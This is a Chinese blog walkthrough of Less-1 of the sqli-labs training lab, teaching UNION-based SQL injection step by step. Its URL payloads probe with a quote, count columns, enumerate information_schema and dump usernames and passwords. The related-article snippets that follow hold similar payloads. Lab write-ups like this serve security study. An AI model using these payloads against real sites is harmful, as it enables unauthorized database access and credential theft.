GET报错注入(Sqli-labs第一题详解)

最新推荐文章于 2023-09-11 09:22:29 发布
最新推荐文章于 2023-09-11 09:22:29 发布
阅读量1.9k 收藏 1
点赞数 1
分类专栏: CTF 护网(HW) 文章标签: 数据库 sql 安全 get union
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hardworking666/article/details/122333545
版权

文章目录

一、找注入点

单引号注入题目,在参数后面加一个单引号:

/?id=1'

在这里插入图片描述
数据库报错,单引号匹配出错,即添加的单引号成功被数据库解析,可以通过闭合id参数,插入构造的sql语句实施攻击。

二、order by判断列数

order by 1、2、3都尝试,无报错。

/?id=1' order by 4 --+

用4的话报错:Unknown column ‘4’ in ‘order clause’

证明当前数据库表只有3列。可以使用union的联合注入。

三、union联合注入,判断数据显示点

使用union语句的前提为:union 后面的语句必须与前面的语句字段数以及类型一致,否则数据库会报错。

因为sql语句的执行结果只有第一行会被回显在页面上,所以要把原始语句的的结果集变为空,这样想要的结果才能显示在界面上。

现在需要确定哪几个字段会被显示在页面上,判断数据显示点 (id一定要改为0或负数):

/?id=0' union select 1,2,3 --+

页面返回提示:
Your Login name:2
Your Password:3

可以看到字段2,3被显示在了页面上。

四、爆库、爆表

爆登录用户和数据库名:

/?id=0'  union select 1,user(),database()­­ --+

获取当前用户,当前数据库,数据库版本,数据库路径:

/?id=1' union select 1,concat_ws('_',user(),database(),version()),@@basedir

利用元数据库来爆表、爆数据:

/?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

在这里插入图片描述

查看数据库有哪些表:

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 --+

查看对应表有哪些列:

union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 --+

查看账号密码信息(加0x3A即%3A是为区分用其代表的“:”来区分用户名和密码):

union select 1,(select group_concat(concat_ws(0x3A,username,password))from users),3 --+

在这里插入图片描述

SQL注入篇——sqli-labs最详细1-40闯关指南
https://admin-root.blog.csdn.net/article/details/103932264

sqlilabs教程(1-10)
https://blog.csdn.net/he_and/article/details/79979616

sqli-labs闯关指南1—10
https://blog.csdn.net/sdb5858874/article/details/80727555

Hardworking666
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs如何解决
sqli-labs
weixin_53955759的博客
04-13 2925
Less-1: 1.查字段数 2.看回显位置 3.爆数据库 4.爆表 5.爆字段 6.获取信息 Less-2: 相同步骤 1.查字段数 2.看回显位置 3.爆数据库 4.表名 5.爆字段 6.获取信息 Less-3: 看了源码发现要闭合括号 1.爆字段数 ...
SQL注入sqli第四关(less-4)
s_xcx_ah的博客
06-10 1227
SQLI第四关
Sqli-labs 基本注入篇 (Less1~22)
angry_program的博客
01-20 1278
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 基本注入篇对应labs的1~22关: 目录 Sqli-labs 基本注入篇 Less-1 单引号显注入 一、手工注入 1. 判断字符型与整数型注入 2. 爆字段数 3. 爆库爆表爆字段 4. 取对应字段的值 二、sqlmap自动注入 1. 检测目标网站存在的注入漏洞类型 2....
sqli靶场通关之less4
sunxueer的博客
07-15 324
sqli less4 方法一:updatexml函数 1. 找闭合字符 id = 1”) //异常 id = 1”) and 1 =1 -- + //正确 id = 1”) and 1 =2 -- + //误 说明可能存在双引号字符型注入 2. 求列数 id=1") order by 3 -- + id=1") order by 4 -- + 说明有3列 3. 求显示位 id=1") and 1=2 union select 1,2,3 -- + 4. 爆数据库名 id=1"
iwebsec靶场SQL注入漏洞-数字型注入
qq_56041380的博客
03-23 254
group_concat()是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。information_schema数据库存储了SCHEMATA表,TABLES表和COLUMNS表。information_schema数据库是MYSQL自带的数据库,它提供访问数据库元数据的方式。我们可以看到当前数据库的表有sqli,user,users,xss。当把order by 里的数字加到4列时显示。测试3列结果还是显示正常。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
SQL注入漏洞攻防--sql labs
mackilo的博客
12-20 8118
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB。注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
Unknown column ‘xxx‘ in ‘order clause‘
热门推荐
weixin_45759606的博客
10-21 1万+
Unknown column ‘idASC’ in ‘order clause’,一种可能 根据搜索,多数人提出是查询语句的问; 我也是各种找,最后是因为空格 ‘ ’ 的原因,代码对比如下: 误的代码 String orderByClause = sortBy + (desc ? "DESC" : "ASC"); 正确的代码: String orderByClause = sortBy + " " +(desc ? "DESC" : "ASC"); 就是在字符串拼接的时候,漏掉空格; 也可以这
SQLI-LABS 01.第一关 【显注入_单引号闭合】
weixin_45284414的博客
05-15 293
首先主动输入一个单引号提前闭合,最后-- x注释掉后边内容。中间可以构造使用AND OR 拼接语句进行探测。01.第一关 【显注入_单引号闭合】)利用常规的显注入去做
sqli第一关
最新发布
qq_52178594的博客
09-11 1393
这个问问的好,在url解释执行的时候,url中#号是用来指导浏览器动作的,对服务器端无用,所以我们要将#写成%23来完成注入。哈哈哈哈,这个问问的有点刁钻,果然阁下是人中龙凤,马中赤兔,不鸣则已,一鸣惊人。额,一看你就没学过MySQL,小伙子我这就帮不了你啦,在工作或者学习中,总有很多东西是我们不了解甚至闻所未闻的,这很正常。因为使用-- (后接一个单纯的空格),在传输过程中空格会被忽略,会导致无法注释,所以在get请求传参注入时才会使用--+的方式来闭合,因为+在SQL语句中会被解释成空格。
SQL注入绕过(passby)策略
Megumiwind的博客
08-09 1387
:[极客大挑战 2019]BabySQL1 首先输入万能密码进行尝试:' or '1'='1-- -,发现回显是误用户名和密码,说明没有注入成功,然后输入在用户名处输入1'发现。 根据信息推断出闭合的条件就是单引号',所以继续在用户名处输入1'-- -,密码:1(一下密码不做特殊声明外均为1)进一步验证判断是否正确。 ...
sql注入注入 练习
qq_41619455的博客
08-02 274
sql 注入
sql-lab(ALL 1-65)
lee_maple的博客
03-08 7607
less-1(基于误的GET单引号字符型注入) id=1 //回显正常 id=1' //信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 id=1' order by 4 # //用
GET注入
qq_43776408的博客
06-09 623
介绍 使用的正常的语句无法显示想要查询的数据,然后我们故意输入的语句来强迫数据库 爆出数据来 GET单引号注入 以less-5为例 原sql语句 select * from admin where id=‘id’ limit 0,1 回顾一下 浏览器输入id=1正确 显示you are in 在输入id=1 显示误 you have an error in "1’ LIMIT 0,1’ 去掉外引号 ‘1’ LIMIT 0,1 你想啊,输入1是对的 但是输入1\是的 所以就是多出了一个\
SQL中的GET注入
m0_69676459的博客
04-30 569
SQL中GET注入
sqli-labs第一
09-03
sqli-labs的第一是一个简单的SQL注入挑战,旨在让你熟悉基本的SQL注入技术。该目要求你通过输入特定的注入语句来绕过应用程序的身份验证系统,以获得管理员权限。 具体步骤如下: 1. 打开sqli-labs网站并导航...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值